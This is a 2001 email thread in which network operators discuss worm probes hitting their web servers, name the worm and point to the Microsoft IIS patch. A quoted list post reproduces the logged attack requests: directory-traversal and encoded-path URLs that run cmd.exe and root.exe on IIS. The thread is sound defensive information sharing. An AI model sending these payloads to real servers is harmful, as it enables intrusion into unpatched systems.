|> -----Original Message----- |> From: Jaco Engelbrecht [mailto:bje@serendipity.org.za] |> Sent: Tuesday, September 18, 2001 9:01 AM |> To: Roeland Meyer |> Subject: Re: Worm probes |> |> |> Hi, |> |> Sorry for emailling you directly, but I can't post to the nanog list. |> It's `Code Blue` that's going around atm. |> |> Will bounce you a seperate message now. |> |> Regards, |> Jaco |> |> -----Original Message----- Received: from serendipity.org.za ([196.14.22.14]) by condor.mhsc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id SBLN3KQ6; Tue, 18 Sep 2001 09:02:18 -0700 Received: from nobody by serendipity.org.za with scanned_ok (Exim 3.22 #6) id 15jNJQ-0003O1-00 for rmeyer@mhsc.com; Tue, 18 Sep 2001 18:01:28 +0200 Received: from etna.serendipity.org.za ([196.14.22.132] helo=etna) by serendipity.org.za with smtp (Exim 3.22 #6) id 15jNJP-0003Ns-00 for rmeyer@mhsc.com; Tue, 18 Sep 2001 18:01:27 +0200 Message-ID: <03e301c1405b$b728cab0$84160ec4@serendipity.org.za> From: "Jaco Engelbrecht" <bje@serendipity.org.za> To: "Roeland Meyer" <rmeyer@mhsc.com> Subject: Fw: [hamster@vom.tm: Re: New worm going 'round?] (fwd) Date: Tue, 18 Sep 2001 18:05:18 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 X-Checked: This message has been scanned for any virusses and unauthorized attachments. X-iScan: Version $Id: iScan,v 1.35 2001/03/04 20:15:54 rip Exp $ |> From: Jaco Engelbrecht [mailto:bje@serendipity.org.za] |> Sent: Tuesday, September 18, 2001 9:05 AM |> To: Roeland Meyer |> Subject: Fw: [hamster@vom.tm: Re: New worm going 'round?] (fwd) |> Importance: High |> |> |> Hi Roland, |> |> `Code Blue` - see http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dex ploit%26vid%3D1806 |> |> And for the the solution: |> "The patch released with the advisory MS00-057 |> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp) |> eliminates this vulnerability, therefore those who have already |> applied this patch do not have to take any further action. Otherwise, |> the patch is available |> at the following locations: |> |> IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp |> IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp" |> |> Regards, |> Jaco |> |> -- |> bje@serendipity.org.za |> the faculty of making fortunate discoveries |> |> ----- Forwarded message from The Flying Hamster |> <hamster@vom.tm> ----- |> |> Date: Tue, 18 Sep 2001 15:36:20 +0100 |> From: The Flying Hamster <hamster@vom.tm> |> To: list@inet-access.net |> Subject: Re: New worm going 'round? |> Reply-To: list@inet-access.net |> |> On Tue, Sep 18, 2001 at 10:31:59AM -0400, Gerald T. Freymann wrote: |> > If I tail -f httpd-error.log these errors are going by |> faster than I |> can |> > read! omg! |> |> Same here, the signature requests appear to be |> |> GET /MSADC/root.exe?/c+dir HTTP/1.0 |> GET |> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir |> HTTP/1.0 |> GET /_vti_bin/..%255c../..%25 |> GET |> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir |> HTTP/1.0 |> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET |> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c |> 1%1c../wi |> nnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |> GET /scripts/root.exe?/c+dir HTTP/1.0 |> |> It looks like each of these are tried against each IP being probed. |> |> -- |> The Flying Hamster <hamster@suespammers.org> |> http://hamster.wibble.org/ |> "Unarmed...and extremely attractive." -- Dana Scully on Windows 95 |> - |> Recent archives of the list can be found at: |> http://mix.twistedpair.ca/pipermail/inet-access/ |> Send 'unsubscribe' in the body to 'list-request@inet-access.net' to |> leave. |> Eat sushi frequently. inet@inet-access.net is the human contact |> address. |> |> ----- End forwarded message ----- |> |> |> |>